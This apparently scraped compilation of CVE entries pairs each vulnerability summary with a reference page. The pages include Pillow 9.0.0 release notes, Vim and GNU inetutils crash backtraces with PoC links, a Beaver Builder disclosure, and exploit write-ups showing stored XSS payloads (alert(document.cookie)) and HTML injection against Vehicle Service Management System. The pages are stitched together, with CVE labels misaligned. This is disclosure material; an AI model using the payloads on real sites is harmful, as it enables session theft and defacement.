PIL.ImageMath.eval in Pillow before 9.0.0 allows evaluation of arbitrary expressions, such as ones that use the Python exec method.

**Fredrik Lundh¶**

This release is dedicated to the memory of Fredrik Lundh, aka Effbot, who died in November 2021. Fredrik created PIL in 1995 and he was instrumental in the early success of Python.

Guido wrote:

> Fredrik was an early Python contributor (e.g. Elementtree and the ‘re’ module) and his enthusiasm for the language and community were inspiring for all who encountered him or his work. He spent countless hours on comp.lang.python answering questions from newbies and advanced users alike.
> 
> He also co-founded an early Python startup, Secret Labs AB, which among other software released an IDE named PythonWorks. Fredrik also created the Python Imaging Library (PIL) which is still THE way to interact with images in Python, now most often through its Pillow fork. His effbot.org site was a valuable resource for generations of Python users, especially its Tkinter documentation.

Thank you, Fredrik.

**Backwards Incompatible Changes¶**

**Python 3.6¶**

Pillow has dropped support for Python 3.6, which reached end-of-life on 2021-12-23.

**PILLOW\_VERSION constant¶**

`PILLOW_VERSION` has been removed. Use `__version__` instead.

**FreeType 2.7¶**

Support for FreeType 2.7 has been removed; FreeType 2.8 is the minimum supported.

We recommend upgrading to at least FreeType 2.10.4, which fixed a severe vulnerability introduced in FreeType 2.6 (CVE-2020-15999).

**Image.show command parameter¶**

The `command` parameter has been removed. Use a subclass of `PIL.ImageShow.Viewer` instead.

**Image.\_showxv¶**

`Image._showxv` has been removed. Use `show()` instead. If custom behaviour is required, use `register()` to add a custom `Viewer` class.

**ImageFile.raise\_ioerror¶**

`IOError` was merged into `OSError` in Python 3.3. So, `ImageFile.raise_ioerror` has been removed. Use `ImageFile.raise_oserror` instead.

**API Changes¶**

**Added line width parameter to ImageDraw polygon¶**

An optional line `width` parameter has been added to `ImageDraw.Draw.polygon`.

**API Additions¶**

**ImageShow.XDGViewer¶**

If `xdg-open` is present on Linux, this new `PIL.ImageShow.Viewer` subclass will be registered. It displays images using the application selected by the system.

It is higher in priority than the other default `PIL.ImageShow.Viewer` instances, so it will be preferred by `im.show()` or `ImageShow.show()`.

**Added support for “title” argument to DisplayViewer¶**

Support has been added for the “title” argument in `DisplayViewer`, so that when `im.show()` or `ImageShow.show()` use the `display` command line tool, the “title” argument will also now be supported, e.g. `im.show(title="My Image")` and `ImageShow.show(im, title="My Image")`.

**Security¶**

**Ensure JpegImagePlugin stops at the end of a truncated file¶**

`JpegImagePlugin` may append an EOF marker to the end of a truncated file, so that the last segment of the data will still be processed by the decoder.

If the EOF marker is not detected as such however, this could lead to an infinite loop where `JpegImagePlugin` keeps trying to end the file.

**Remove consecutive duplicate tiles that only differ by their offset¶**

To prevent attempts to slow down loading times for images, if an image has consecutive duplicate tiles that only differ by their offset, only load the last tile. Credit to Google’s OSS-Fuzz project for finding this issue.

**Restrict builtins available to ImageMath.eval¶**

To limit `PIL.ImageMath` to working with images, Pillow will now restrict the builtins available to `PIL.ImageMath.eval()`. This will help prevent problems arising if users evaluate arbitrary expressions, such as `ImageMath.eval("exec(exit())")`. CVE TBD

**Fixed ImagePath.Path array handling¶**

CWE-126 and CWE-665 were found when initializing `ImagePath.Path`. CVEs TBD

**Other Changes¶**

**Convert subsequent GIF frames to RGB or RGBA¶**

Since each frame of a GIF can have up to 256 colors, after the first frame it is possible for there to be too many colors to fit in a P mode image. To allow for this, seeking to any subsequent GIF frame will now convert the image to RGB or RGBA, depending on whether or not the first frame had transparency.

**Switched to libjpeg-turbo in macOS and Linux wheels¶**

The Pillow wheels from PyPI for macOS and Linux have switched from libjpeg to libjpeg-turbo. It is a fork of libjpeg, popular for its speed.

**Added support for pickling TrueType fonts¶**

TrueType fonts may now be pickled and unpickled. For example:

import pickle
from PIL import ImageFont

font \= ImageFont.truetype("arial.ttf", size\=30)
pickled\_font \= pickle.dumps(font, protocol\=pickle.HIGHEST\_PROTOCOL)

\# Later...
unpickled\_font \= pickle.loads(pickled\_font)

**Added support for additional TGA orientations¶**

TGA images with top right or bottom right orientations are now supported.

CVE-2022-22817: 9.0.0

A Pointer Dereference vulnerability exists in Vim 8.2.3883 via the vim_regexec_multi function at regexp.c, which causes a denial of service.

**Description**

Untrusted Pointer Dereference leading to a segmentation fault Segmentation fault in vim\_regexec\_multi () at regexp.c:2896

**Proof of Concept**

    ./vim -u NONE -X -Z -e -s -S POC1 -c ':qa!
    

\[POC1\]\[https://drive.google.com/file/d/1VOS93VSakO96z2rnvId\_WDYRM9KAEIgC/view?usp=sharing\]

**bt**

    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    RAX: 0x14 
    RBX: 0x7fffffff8520 --> 0x9 ('\t')
    RCX: 0x14 
    RDX: 0x2 
    RSI: 0x10007fff7000 --> 0x0 
    RDI: 0x7fffffff87e0 --> 0x0 
    RBP: 0x7fffffff87a0 --> 0x7fffffff8b70 --> 0x7fffffffa0d0 --> 0x7fffffffb150 --> 0x7fffffffb980 --> 0x7fffffffb9f0 (--> ...)
    RSP: 0x7fffffff8420 --> 0x41b58ab3 
    RIP: 0xa54c3b (<vim_regexec_multi+635>: cmp    DWORD PTR [rax],0x0)
    R8 : 0x625000002900 --> 0x3e8 
    R9 : 0x625000005100 --> 0x9 ('\t')
    R10: 0x4 
    R11: 0x0 
    R12: 0x0 
    R13: 0xffffffff0fc --> 0x0 
    R14: 0x0 
    R15: 0x0
    EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0xa54c28 <vim_regexec_multi+616>:    mov    rdi,QWORD PTR [rbx+0x148]
       0xa54c2f <vim_regexec_multi+623>:    call   0x49c430 <__asan_report_load4>
       0xa54c34 <vim_regexec_multi+628>:    mov    rax,QWORD PTR [rbx+0x148]
    => 0xa54c3b <vim_regexec_multi+635>:    cmp    DWORD PTR [rax],0x0
       0xa54c3e <vim_regexec_multi+638>:    je     0xa54c75 <vim_regexec_multi+693>
       0xa54c44 <vim_regexec_multi+644>:    movabs rdi,0x1172840
       0xa54c4e <vim_regexec_multi+654>:    call   0x41d310 <gettext@plt>
       0xa54c53 <vim_regexec_multi+659>:    mov    rdi,rax
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff8420 --> 0x41b58ab3 
    0008| 0x7fffffff8428 --> 0x100b3cb ("1 32 160 13 rex_save:2892")
    0016| 0x7fffffff8430 --> 0xa549c0 (<vim_regexec_multi>: push   rbp)
    0024| 0x7fffffff8438 --> 0x7fffffffb180 --> 0x615000000d00 --> 0xbebebebefbad2488 
    0032| 0x7fffffff8440 --> 0x7fffffff8480 --> 0x7fffffff8980 --> 0x7fffffff8b70 --> 0x7fffffffa0d0 --> 0x7fffffffb150 (--> ...)
    0040| 0x7fffffff8448 --> 0x4c5d0e (<lalloc+174>:    mov    QWORD PTR [rbp-0x20],rax)
    0048| 0x7fffffff8450 --> 0x614000000840 --> 0x619024800004 --> 0x0 
    0056| 0x7fffffff8458 --> 0xfffffc4300000001 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x0000000000a54c3b in vim_regexec_multi (rmp=0x7fffffff87e0, win=0x625000002900, buf=0x625000005100, lnum=0x4, col=0x0, tm=0x0, timed_out=0x0) at regexp.c:2896
    2896        if (rmp->regprog->re_in_use)
    gdb-peda$ bt
    #0  0x0000000000a54c3b in vim_regexec_multi (rmp=0x7fffffff87e0, win=0x625000002900, buf=0x625000005100, lnum=0x4, col=0x0, tm=0x0, timed_out=0x0) at regexp.c:2896
    #1  0x00000000006b45ab in ex_global (eap=0x7fffffff8bc0) at ex_cmds.c:4976
    #2  0x00000000006cdd66 in do_one_cmd (cmdlinep=0x7fffffffa100, flags=0x7, cstack=0x7fffffffa120, fgetline=0xb26990 <getsourceline>, cookie=0x7fffffffb180) at ex_docmd.c:2572
    #3  0x00000000006c0a9d in do_cmdline (cmdline=0x611000000680 "", fgetline=0xb26990 <getsourceline>, cookie=0x7fffffffb180, flags=0x7) at ex_docmd.c:994
    #4  0x0000000000b25523 in do_source (fname=0x60b000000ca3 "../../../CVE_testing/result/vim/afl-out-d1/crashes/id:000003,sig:11,src:004713+005102,op:splice,rep:2", check_other=0x0, 
        is_vimrc=0x0, ret_sid=0x0) at scriptfile.c:1420
    #5  0x0000000000b228eb in cmd_source (fname=0x60b000000ca3 "../../../CVE_testing/result/vim/afl-out-d1/crashes/id:000003,sig:11,src:004713+005102,op:splice,rep:2", eap=0x7fffffffba60)
        at scriptfile.c:985
    #6  0x0000000000b22641 in ex_source (eap=0x7fffffffba60) at scriptfile.c:1011
    #7  0x00000000006cdd66 in do_one_cmd (cmdlinep=0x7fffffffcfa0, flags=0xb, cstack=0x7fffffffcfc0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2572
    #8  0x00000000006c0a9d in do_cmdline (cmdline=0x60b000000a90 "so ../../../CVE_testing/result/vim/afl-out-d1/crashes/id:000003,sig:11,src:004713+005102,op:splice,rep:2", fgetline=0x0, 
        cookie=0x0, flags=0xb) at ex_docmd.c:994
    #9  0x00000000006c40b4 in do_cmdline_cmd (cmd=0x60b000000a90 "so ../../../CVE_testing/result/vim/afl-out-d1/crashes/id:000003,sig:11,src:004713+005102,op:splice,rep:2")
        at ex_docmd.c:588
    #10 0x0000000000f39719 in exe_commands (parmp=0x1a99e80 <params>) at main.c:3080
    #11 0x0000000000f36873 in vim_main2 () at main.c:774
    #12 0x0000000000f2f64d in main (argc=0xb, argv=0x7fffffffe2d8) at main.c:426
    #13 0x00007ffff7be10b3 in __libc_start_main (main=0xf2ee20 <main>, argc=0xb, argv=0x7fffffffe2d8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, 
        stack_end=0x7fffffffe2c8) at ../csu/libc-start.c:308
    #14 0x000000000041da9e in _start ()
    
    

**Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

CVE-2021-46059: Untrusted Pointer Dereference in vim

A NULL Pointer Dereference vulnerability exists in GNU inetutils 2.2 via the setcmd function at commands.c, which causes a denial of service.

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

\[POC1\](https://drive.google.com/file/d/1snLElamVgMu5SO1vkKvSQqOByBlX0zxb/view?usp=sharing)

Program received signal SIGSEGV, Segmentation fault.

\[----------------------------------registers-----------------------------------\]

RAX: 0x10 

RBX: 0x3 

RCX: 0x3 

RDX: 0x0 

RSI: 0x55555556d0c5 --> 0x6572207325006666 ('ff')

RDI: 0x555555577068 --> 0xa001c23 

RBP: 0x555555576ea0 --> 0x555555577060 --> 0x100b002000746553 

RSP: 0x7fffffffe1b0 --> 0x555555577060 --> 0x100b002000746553 

RIP: 0x55555555b7cd (<setcmd+701>: mov    BYTE PTR \[rdx\],al)

R8 : 0x555555577067 --> 0xa001c2310 

R9 : 0x0 

R10: 0x55555556d439 --> 0x69626d413f00203e ('> ')

R11: 0x7fffffffe65c --> 0x550074656e6c6574 ('telnet')

R12: 0x555555575b60 --> 0x55555556f7fb --> 0x4341492073250020 (' ')

R13: 0x7fffffffe380 --> 0x1 

R14: 0x0 

R15: 0x0

EFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)

\[-------------------------------------code-------------------------------------\]

   0x55555555b7bf <setcmd+687>: cmove  eax,edx

   0x55555555b7c2 <setcmd+690>: nop    WORD PTR \[rax+rax\*1+0x0\]

   0x55555555b7c8 <setcmd+696>: mov    rdx,QWORD PTR \[r12+0x18\]

\=> 0x55555555b7cd <setcmd+701>: mov    BYTE PTR \[rdx\],al

   0x55555555b7cf <setcmd+703>: mov    rax,QWORD PTR \[r12+0x18\]

   0x55555555b7d4 <setcmd+708>: movzx  edi,BYTE PTR \[rax\]

   0x55555555b7d7 <setcmd+711>: call   0x55555555aed0 <control>

   0x55555555b7dc <setcmd+716>: mov    rdx,QWORD PTR \[r12\]

\[------------------------------------stack-------------------------------------\]

0000| 0x7fffffffe1b0 --> 0x555555577060 --> 0x100b002000746553 

0008| 0x7fffffffe1b8 --> 0x5555555754e0 --> 0x55555556d48c --> 0x67676f7400746573 ('set')

0016| 0x7fffffffe1c0 --> 0x0 

0024| 0x7fffffffe1c8 --> 0x1 

0032| 0x7fffffffe1d0 --> 0x7fffffffe380 --> 0x1 

0040| 0x7fffffffe1d8 --> 0x55555555dadb (<command+411>: test   eax,eax)

0048| 0x7fffffffe1e0 --> 0x0 

0056| 0x7fffffffe1e8 --> 0x7fffffffe390 --> 0x0 

\[------------------------------------------------------------------------------\]

Legend: code, data, rodata, value

Stopped reason: SIGSEGV

0x000055555555b7cd in setcmd (argc=0x3, argv=0x555555576ea0 <margv>) at commands.c:1152

1152       \*(ct->charp) = (cc\_t) value;

gdb-peda$ bt

#0  0x000055555555b7cd in setcmd (argc=0x3, argv=0x555555576ea0 <margv>) at commands.c:1152

#1  0x000055555555dadb in command (top=0x1, tbuf=0x0, cnt=<optimized out>) at commands.c:3047

#2  0x0000555555559fe4 in main (argc=0x0, argc@entry=0x1, argv=0x7fffffffe390, argv@entry=0x7fffffffe388) at main.c:426

#3  0x00007ffff7db60b3 in \_\_libc\_start\_main (main=0x555555559d60 <main>, argc=0x1, argv=0x7fffffffe388, init=<optimized out>, fini=<optimized out>, 

    rtld\_fini=<optimized out>, stack\_end=0x7fffffffe378) at ../csu/libc-start.c:308

#4  0x000055555555a01e in \_start () at main.c:426

CVE-2021-46060: NULL Pointer Dereference in setcmd () at commands.c:1152

An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions.

CVE-2021-22569

About Monorail User Guide Release Notes Feedback on Monorail Terms Privacy

CVE-2021-22569: 39330 - oss-fuzz - OSS-Fuzz: Fuzzing the planet

In Beaver Themer, attackers can bypass conditional logic controls (for hiding content) when viewing the post archives. Exploitation requires that a Themer layout is applied to the archives, and that the post excerpt field is not set.

**Bottom line up front**

I discovered two sensitive information disclosure vulnerabilities that affect **Beaver Builder’s** element visibility and **Beaver Themer’s** conditional logic controls. These vulnerabilities are resolved in Beaver Builder 2.5.1!

These vulnerabilities allow ANY user to view content that is hidden via the visibility or conditional logic controls.

**NOTE:** these vulnerabilities have been resolved by the Beaver Builder team, however, 3rd parties that have built their own modules (ie post archive /search modules) must update their module’s code so that their modules do not leak sensitive information. The Beaver Builder team has notified many of the 3rd party developers. The Beaver Builder team has also posted a developer oriented article about this issue.

**The Issues**

Content protected with visibility or conditional logic controls is accessible:

*   to ANY user via the **WordPress REST API** _(CVE-2021-42748)_
*   if a Beaver Themer layout is applied, and the post excerpt field is not set, the protected content may be shown in _(CVE-2021-42749)_:
    *   **post archive**
    *   **search results**
    *   potentially in **Google Search**

**What is affected****Beaver Builder**

The **lite** (2.5.0.3 and older) and **professional** versions (2.5.0.3 and older) of the Beaver Builder page builder are affected. The lite version of Beaver Builder is installed on more than **200,000** websites.

**NOTE:** at the time of this writing, the Beaver Builder team hasn’t released an update for the lite version of Beaver Builder. They plan to release the Beaver Builder Lite update the week of 12/12/2021.

**Beaver Themer**

Beaver Themer is also affected. Beaver Themer is an add-on to the professional version of the Beaver Builder page builder which allows you to design every front-end area of WordPress.

The fix for the Beaver Themer vulnerability is included in Beaver Builder 2.5.1. Beaver Themer’s Conditional Logic feature is functionally separate from Beaver Builder’s visibility feature, but Beaver Themer uses a filter to hook into Beaver Builder’s codebase. The Beaver Builder 2.5.1 patch addresses both vulnerabilities.

**Timeline**

The Beaver Builder team was extremely responsive and professional as they developed a fix to remediate these vulnerabilities!

*   **Notification Sent to Beaver Builder**
    *   Sunday, 10/17/2021
*   **1st Response from Beaver Builder**
    *   Monday, 10/18/2021
*   **Patch Sent to Me for Testing**
    *   Tuesday, 11/16/2021
*   **Patch for Beaver Builder Professional Released**
    *   Thursday, 12/9/2021

**Vulnerability Summary**

The **lite** & **professional** versions of **Beaver Builder** include **visibility settings** which allow you to limit the visibility of content based on the user’s login status. You can even specify a WordPress capability (aka permission) that the user must have to see the content.

![](https://tekfused.com/wp-content/uploads/2021/10/image-12.png)

Beaver Builder Lite visibility settings

**Beaver Themer** extends the visibility controls by adding **conditional logic**. Conditional logic allows you to create complex if-then-this conditions to control the visibility of content. A simple example would be “show the content only IF the user is a customer.”

![](https://tekfused.com/wp-content/uploads/2021/10/Conditional-Logic-2.png)

Beaver Themer Conditional Logic

Visibility rules & conditional logic are checked on the server side before delivering the rendered page. As such, these features should be able to be used to control access to sensitive content on a page.

The Beaver Builder team gave the following explanation:

> The Post modules and the search module used the native WP the\_excerpt() which looks at the saved data in post\_content. The fix we implemented is to bypass that and use our layout functions. BB mirrors text based modules text in normal post content as a block so if you deactivate no text data or images are lost. So when WP looks up the excerpt it sees that data. As a result of that, it isn’t that we fixed a bug per se, more that we had to change default behavior.

**The Test Page**

The **first row** is hidden by using the visibility control “Display -> Logged In User” setting:

![](https://tekfused.com/wp-content/uploads/2021/10/image-1.png)

Row 1 settings

The **second row** is hidden by using the Conditional Logic setting (user role equals “Customer”):

![](https://tekfused.com/wp-content/uploads/2021/10/image-14.png)

Row 2 settings

The **third row** is visible to all users.

![](https://tekfused.com/wp-content/uploads/2021/10/image-4.png)

Row 3 settings

The page displays the “Content for the world!” text module for anonymous users as expected.

![](https://tekfused.com/wp-content/uploads/2021/10/image-8.png)

Test page seen as an unauthenticated user

**The Vulnerabilities****Content Exposed in the WordPress REST API (CVE-2021-42748)**

_This vulnerability affects **Beaver Builder** (Lite & Professional) and **Beaver Themer**._

I sent a request to the “Posts” WordPress REST API endpoint as an unauthenticated (ie not logged in) user, and observed the protected content.

![](https://tekfused.com/wp-content/uploads/2021/10/image-6.png)

Unathenticated REST API call to WordPress

**Content Exposed in the Post Archive (CVE-2021-42749)**

_This vulnerability affects **Beaver Themer**._

If:

*   A Beaver Themer layout is applied to the post/search archive
*   The post’s “Excerpt” field is not set
*   The protected content is at the top of the post’s content

The protected content will be displayed under the post’s title.

![](https://tekfused.com/wp-content/uploads/2021/10/image-9.png)

Post archive showing protected content

**Content Exposed in Google Search (CVE-2021-42749)**

_This vulnerability affects **Beaver Themer**._

Google lists the protected content in the Google SERP as it is displayed in the post category archive.

**RSS Feeds**

I tested the RSS feeds as an unauthenticated user, and they did **NOT** show the protected content.

**Conclusion**

The solution to these vulnerabilities is to update to Beaver Builder **2.5.1**!

The principle of least functionality applies here – if you do not utilize the REST API, disable it – at least for unauthenticated users.

CVE-2021-42749: Beaver Builder Vulnerabilities - Visibility and Conditional Logic (CVE-2021-42748 & CVE-2021-42749) - TEKFused

Laundry Booking Management System 1.0 (Latest) and previous versions are affected by a remote code execution (RCE) vulnerability in profile.php through the "image" parameter that can execute a webshell payload.

В тази папка няма файлове.Влезте в профила си, за да добавите файлове в тази папка

CVE-2021-45003: Laundry_Booking_Management_RCE – Google Диск

An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.

**Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scripting**

Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scripting

**Exploit Title: Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scripting****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
*   https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

**1\. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to My Account section http://localhost/vehicle\_service/admin/?page=user

**Code:**

<!DOCTYPE html\>
<html\>
<title\>Stored XSS</title\>
<body\>
<script\>
alert(document.cookie);
</script\>
</body\>
</html\>

3.  Save the above html code For Ex:XSS.html
4.  In My Account Section enter all the required details and browse the html file in Avatar.
5.  Click on update button.
6.  Open the avatar image in new tab.
7.  Malicious javascript code triggered.

**2\. Vehicle Service Management System - 'User List' (/admin/?page=user/manage\_user)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to User List section and click on Create New button.

**Code:**

<!DOCTYPE html\>
<html\>
<title\>Stored XSS</title\>
<body\>
<script\>
alert(document.cookie);
</script\>
</body\>
</html\>

3.  Save the above html code For Ex:XSS.html
4.  In Create New User Page enter all the required details and browse the html file in Avatar.
5.  Click on Save button.
6.  Open the avatar image in new tab.
7.  Malicious javascript code triggered.

**3\. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Settings section http://localhost/vehicle\_service/admin/?page=system\_info

**Code:**

<!DOCTYPE html\>
<html\>
<title\>Stored XSS</title\>
<body\>
<script\>
alert(document.cookie);
</script\>
</body\>
</html\>

3.  Save the above html code For Ex:XSS.html
4.  In Settings Section enter all the required details and browse the html file in System Logo.
5.  Click on update button.
6.  Open the System Logo image in new tab.
7.  Malicious javascript code triggered.

**4\. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Settings section http://localhost/vehicle\_service/admin/?page=system\_info

**Code:**

<!DOCTYPE html\>
<html\>
<title\>Stored XSS</title\>
<body\>
<script\>
alert(document.cookie);
</script\>
</body\>
</html\>

3.  Save the above html code For Ex:XSS.html
4.  In Settings Section enter all the required details and browse the html file in Website Cover.
5.  Click on update button.
6.  Open the Website Cover image in new tab.
7.  Malicious javascript code triggered.

CVE-2021-46078: GitHub - plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting: Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scrip

A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.

**Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)**

Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)

**Exploit Title: Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS

**Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Service List section and click on Create New button.
3.  Inject the payload "><script>alert(document.cookie)</script> in Service Name & Description input field.
4.  Click on Save button.
5.  Malicious javascript code triggered.

CVE-2021-46072: GitHub - plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS: Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)

An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.

**Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection**

Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection

**Exploit Title: Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
*   https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection

**1\. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to My Account section http://localhost/vehicle\_service/admin/?page=user

**Code:**

<!DOCTYPE html\>
<html\>
<head\>
<title\>HTML marquee Tag</title\>
</head\>
<body\>
<marquee\>HTML INJECTION</marquee\>
</body\>
</html\>

3.  Save the above html code For Ex:Html Injection.html
4.  In My Account Section enter all the required details and browse the html file in Avatar.
5.  Click on update button.
6.  Open the avatar image in new tab.
7.  Html Injection is Executed.

**2\. Vehicle Service Management System - 'User List' (/admin/?page=user/manage\_user)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to User List section and click on Create New button.

**Code:**

<!DOCTYPE html\>
<html\>
<head\>
<title\>HTML marquee Tag</title\>
</head\>
<body\>
<marquee\>HTML INJECTION</marquee\>
</body\>
</html\>

3.  Save the above html code For Ex:Html Injection.html
4.  In Create New User Page enter all the required details and browse the html file in Avatar.
5.  Click on Save button.
6.  Open the avatar image in new tab.
7.  Html Injection is Executed.

**3\. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Settings section http://localhost/vehicle\_service/admin/?page=system\_info

**Code:**

<!DOCTYPE html\>
<html\>
<head\>
<title\>HTML marquee Tag</title\>
</head\>
<body\>
<marquee\>HTML INJECTION</marquee\>
</body\>
</html\>

3.  Save the above html code For Ex:Html Injection.html
4.  In Settings Section enter all the required details and browse the html file in System Logo.
5.  Click on update button.
6.  Open the System Logo image in new tab.
7.  Html Injection is Executed.

**4\. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Settings section http://localhost/vehicle\_service/admin/?page=system\_info

**Code:**

<!DOCTYPE html\>
<html\>
<head\>
<title\>HTML marquee Tag</title\>
</head\>
<body\>
<marquee\>HTML INJECTION</marquee\>
</body\>
</html\>

3.  Save the above html code For Ex:Html Injection.html
4.  In Settings Section enter all the required details and browse the html file in Website Cover.
5.  Click on update button.
6.  Open the Website Cover image in new tab.
7.  Html Injection is Executed.

CVE-2021-46079: GitHub - plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection: Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection

Tag

#google